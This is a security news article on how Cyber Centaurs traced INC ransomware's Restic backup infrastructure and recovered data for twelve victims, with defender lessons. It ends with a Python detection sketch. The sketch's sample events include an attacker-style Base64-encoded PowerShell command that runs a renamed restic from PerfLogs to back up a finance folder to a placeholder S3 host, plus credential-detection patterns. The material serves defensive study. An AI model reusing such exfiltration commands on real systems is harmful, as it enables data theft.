INC Ransomware: How Cyber Centaurs Recovered Victim Data from Attackers’ Own Backups

CyberSecureFox 🦊

A rare incident response case has highlighted a critical blind spot in many organizations’ ransomware defenses. Cybersecurity firm Cyber Centaurs reports that it gained access to infrastructure linked to the INC ransomware operation, located encrypted backups stored by the threat actors themselves, and successfully restored data for 12 U.S. organizations previously hit by extortion attacks.

From Single Ransomware Incident to INC Ransomware Infrastructure

The investigation began when a U.S. company reported suspicious activity on a production Microsoft SQL Server. Forensic analysis confirmed a ransomware incident involving a variant dubbed RainINC, a modification of the INC ransomware family executed from the PerfLogs directory.

PerfLogs is a system folder created by Windows for performance logging, but in recent years it has become a common hiding place for malware because its presence and name appear benign in most environments. This allowed the attackers to blend their payload into routine system activity.

During incident response, analysts identified traces of the legitimate backup tool Restic on the compromised system. Although Restic did not appear to be used for direct data theft in this case (exfiltration had happened earlier, during lateral movement), its presence proved crucial for pivoting from a single endpoint compromise to the broader INC ransomware backend infrastructure.

Abusing Restic for Stealthy Ransomware Backups

Indicators of INC’s activity included renamed binaries (for example, winupdate.exe masquerading as a system updater), PowerShell scripts used to launch Restic, and hard-coded configuration parameters revealing repository URLs, backup commands, and cloud storage credentials.

PowerShell, Base64 Encoding and Hard-coded Access Keys

A PowerShell script named new.ps1 drew particular attention. It contained Restic commands encoded in Base64 and environment variables with embedded secrets: access keys, S3-compatible passwords, and paths to encrypted backup repositories. This is a classic example of attackers “living off the land” by abusing legitimate tools to make detection harder.

By decoding and analyzing these scripts, Cyber Centaurs concluded that INC operators were reusing the same Restic-based infrastructure across multiple campaigns. Importantly, many associated repositories were not destroyed immediately after each extortion attempt. As a result, stolen datasets remained stored in encrypted form on attacker-controlled cloud storage for an extended period.

Discovery and Decryption of Data from 12 Victim Organizations

Access to this Restic infrastructure confirmed the hypothesis of “long-lived” attacker backups. Cyber Centaurs discovered encrypted archives belonging to 12 unrelated companies across healthcare, manufacturing, technology, and professional services. None of these organizations were their clients, and each represented an independent INC ransomware campaign.

The incident response team was able to decrypt and preserve these backups, then coordinated with law enforcement to identify the impacted organizations and plan next steps. This case demonstrates that, contrary to extortion claims about “irreversible destruction” of data, attacker-held backups can sometimes be recovered and used to restore information thought to be permanently lost.

Industry reports such as the Verizon Data Breach Investigations Report and analyses by companies like Chainalysis, which estimated known ransomware payments at over $1.1 billion in 2023, consistently show that ransomware remains one of the most damaging cyber threats. The INC case underscores that the impact of these attacks is deeply tied to how both defenders and attackers handle backups.

INC Ransomware Tactics, Techniques and Procedures (TTPs)

Cyber Centaurs’ report highlights several tools and techniques consistently used by the INC ransomware group:

Trace-cleaning utilities. These include log wipers and tools to disable logging and antivirus components, reducing the forensic footprint and complicating incident reconstruction.

Remote access tools. The group relies on both legitimate RMM (Remote Monitoring and Management) solutions and unauthorized remote desktop software to maintain persistent access and move laterally across networks.

Network reconnaissance utilities. Scanners and discovery tools are used to map infrastructure, identify high-value systems such as domain controllers and backup servers, and prioritize targets for encryption and data theft.

To help defenders, Cyber Centaurs released YARA and Sigma rules aimed at detecting Restic usage (including binaries run under misleading names) and unusual backup operations from atypical directories. Such patterns can indicate preparation for data exfiltration or an imminent ransomware deployment.

Key Lessons for Defenders: Backup Security and Ransomware Resilience

The INC ransomware case highlights several strategic lessons for organizations strengthening their ransomware defenses:

1. Legitimate tools are a primary attack vector. Adversaries extensively abuse backup and administration tools such as Restic, Veeam, Rclone and similar utilities. Security programs must include tight access control, monitoring and auditing for these tools, not just traditional malware signatures.

2. Shadow backups on attacker infrastructure are now standard. Modern ransomware attacks rarely rely on encryption alone. They often include systematic creation of “shadow” backups on attacker-controlled storage to support double or triple extortion—encrypting, leaking, and reselling data.

3. Backup operations themselves must be monitored. Organizations need to control who can create backups, what can be backed up, and where those backups may be stored. Unusual backup jobs—especially those running at night, from non-standard directories, or under newly created accounts—should trigger immediate investigation.

4. Detection rules and restoration drills are essential. Security teams should integrate detection of Restic and similar tools into SIEM and EDR platforms, ingest new YARA and Sigma rules from reputable research teams, and regularly test ransomware recovery scenarios to validate that offline and offsite backups are both intact and usable.
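As an added example (not Cyber Centaurs' published YARA/Sigma rules and not code from the report), the following Python sketches the detection logic behind lessons 3 and 4 and the Restic indicators described above: it decodes PowerShell -EncodedCommand payloads and flags Restic run under a renamed binary, from an atypical directory such as PerfLogs, or with backup credentials embedded in the command line. The event field names, the atypical-directory list and the sample telemetry are assumptions constructed for this example.

```python
import base64
import ntpath
import re

# Constructed detection example, not Cyber Centaurs' published YARA/Sigma rules. Markers for restic on a
# command line, for the secrets restic reads from its environment, and for PowerShell's encoded-command flag.
RESTIC_MARKERS = re.compile(r"\brestic\b|RESTIC_(?:REPOSITORY|PASSWORD)|-r\s+s3:", re.I)
SECRET_VARS = re.compile(r"RESTIC_PASSWORD|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY", re.I)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
ATYPICAL_DIRS = ("\\perflogs\\", "\\users\\public\\", "\\temp\\", "\\programdata\\")  # assumed list


def decode_encoded_command(cmdline):
    """Return the script behind PowerShell -EncodedCommand (Base64 of UTF-16LE text), or ''."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify_event(event):
    """Detection labels raised for one process-creation event (image, cmdline, original_name)."""
    findings, image = [], event["image"].lower()
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"] + "\n" + decoded      # inspect both the visible and the decoded command
    is_restic_pe = event["original_name"].lower().startswith("restic")
    if not (is_restic_pe or RESTIC_MARKERS.search(text)):
        return findings                           # no restic involvement: nothing to flag
    if is_restic_pe and ntpath.basename(image) != "restic.exe":
        findings.append("renamed_restic_binary")  # PE says restic, file name says otherwise
    if any(d in image or d in text.lower() for d in ATYPICAL_DIRS):
        findings.append("restic_from_atypical_directory")
    if RESTIC_MARKERS.search(decoded):
        findings.append("restic_in_encoded_powershell")
    if SECRET_VARS.search(text):
        findings.append("hardcoded_backup_credentials")
    return findings


# Constructed sample telemetry in the shape of EDR/Sysmon process-creation events (placeholder secrets).
SCRIPT_SOURCE = ("$env:RESTIC_PASSWORD='constructed-pw'; $env:AWS_ACCESS_KEY_ID='CONSTRUCTED-KEY'; "
                 "& C:\\PerfLogs\\winupdate.exe backup C:\\Finance -r s3:https://storage.example/bkt")
SAMPLE_EVENTS = [
    {"image": "C:\\PerfLogs\\winupdate.exe", "original_name": "restic.exe",
     "cmdline": "C:\\PerfLogs\\winupdate.exe backup C:\\Shares -r s3:https://storage.example/bkt"},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "original_name": "PowerShell.EXE",
     "cmdline": "powershell.exe -NoP -EncodedCommand " + base64.b64encode(SCRIPT_SOURCE.encode("utf-16-le")).decode()},
    {"image": "C:\\Program Files\\Restic\\restic.exe", "original_name": "restic.exe",
     "cmdline": "restic.exe backup D:\\Data -r s3:https://backup.corp.example/nightly"},
]
```

The third sample, a properly installed Restic run from Program Files, produces no findings, which is the baseline a rule like this must preserve so that legitimate backup jobs are not drowned in alerts.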

The INC ransomware investigation shows that effective backup governance can do more than mitigate damage; in rare cases, it can even enable recovery of data stored on attacker systems. Treating backup infrastructure and backup tools as Tier 0 assets—with strict access control, continuous monitoring, and well-rehearsed recovery procedures—significantly increases an organization’s chances of withstanding modern ransomware operations and limiting the leverage of extortion groups.
